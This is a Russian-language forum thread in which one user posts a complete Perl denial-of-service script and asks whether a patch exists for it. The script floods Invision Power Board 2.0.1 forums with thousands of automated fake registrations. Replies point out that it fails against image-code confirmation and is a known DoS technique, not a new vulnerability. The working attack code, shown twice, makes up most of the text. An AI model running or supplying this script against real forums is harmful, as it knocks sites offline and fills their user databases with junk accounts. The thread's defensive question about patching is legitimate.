sudmed Опубликовано 21 Февраля 2006 Жалоба Поделиться Опубликовано 21 Февраля 2006 Кто знает, что это за уязвимость и есть ли от нее заплатка? #!/usr/bin/perl use IO::Socket; ################################################## ######## ## _______ _______ ______ # ## |______ |______ | \ # ## ______| |______ |_____/ # ## # ##IPB Register Multiple Users Denial of Service # ##Doesn't Work on forums using "Code Confirmation" # ##Created By SkOd # ##SED security Team # ##http://www.sed-team.ru # ##skod.uk@gmail.com # ##ISRAEL # ################################################## ######## print q{ ################################################## ########## # Invision Power Board Multiple Users DOS # #Tested on IPB 2.0.1 # # created By SkOd. SED Security Team # ################################################## ########## }; $rand=rand(10); print "Forum Host: "; $serv = <stdin>; chop ($serv); print "Forum Path: "; $path = <stdin>; chop ($path); for ($i=0; $i<9999; $i++) { $name="sedXPL_".$rand.$i; $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sed botbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1 &allow_member_mail=1&day=11&month=11&year=1985&agree=1"; $len = length $data; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; print $get1 "POST ".$path."index.php HTTP/1.0\n"; print $get1 "Host: ".$serv."\n"; print $get1 "Content-Type: application/x-www-form-urlencoded\n"; print $get1 "Content-Length: ".$len."\n\n"; print $get1 $data; syswrite STDOUT, "+"; } print "Forum shuld be Dosed. Check it out...\n"; Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 GiV Опубликовано 21 Февраля 2006 Жалоба Поделиться Опубликовано 21 Февраля 2006 Doesn't Work on forums using "Code Confirmation" И не уязвимость, а DOS. Сама идея и скрипт не нов. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 yurclub Опубликовано 26 Февраля 2006 Жалоба Поделиться Опубликовано 26 Февраля 2006 GiV, я правильно понимаю, что она не будет работать если при регистрации нужно вводить код с картинки? все, сообразил. ##Doesn't Work on forums using "Code Confirmation" # Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
sudmed
Кто знает, что это за уязвимость и есть ли от нее заплатка?
#!/usr/bin/perl use IO::Socket; ################################################## ######## ## _______ _______ ______ # ## |______ |______ | \ # ## ______| |______ |_____/ # ## # ##IPB Register Multiple Users Denial of Service # ##Doesn't Work on forums using "Code Confirmation" # ##Created By SkOd # ##SED security Team # ##http://www.sed-team.ru # ##skod.uk@gmail.com # ##ISRAEL # ################################################## ######## print q{ ################################################## ########## # Invision Power Board Multiple Users DOS # #Tested on IPB 2.0.1 # # created By SkOd. SED Security Team # ################################################## ########## }; $rand=rand(10); print "Forum Host: "; $serv = <stdin>; chop ($serv); print "Forum Path: "; $path = <stdin>; chop ($path); for ($i=0; $i<9999; $i++) { $name="sedXPL_".$rand.$i; $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sed botbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1 &allow_member_mail=1&day=11&month=11&year=1985&agree=1"; $len = length $data; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; print $get1 "POST ".$path."index.php HTTP/1.0\n"; print $get1 "Host: ".$serv."\n"; print $get1 "Content-Type: application/x-www-form-urlencoded\n"; print $get1 "Content-Length: ".$len."\n\n"; print $get1 $data; syswrite STDOUT, "+"; } print "Forum shuld be Dosed. Check it out...\n";Ссылка на комментарий
Поделиться на других сайтах
2 ответа на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.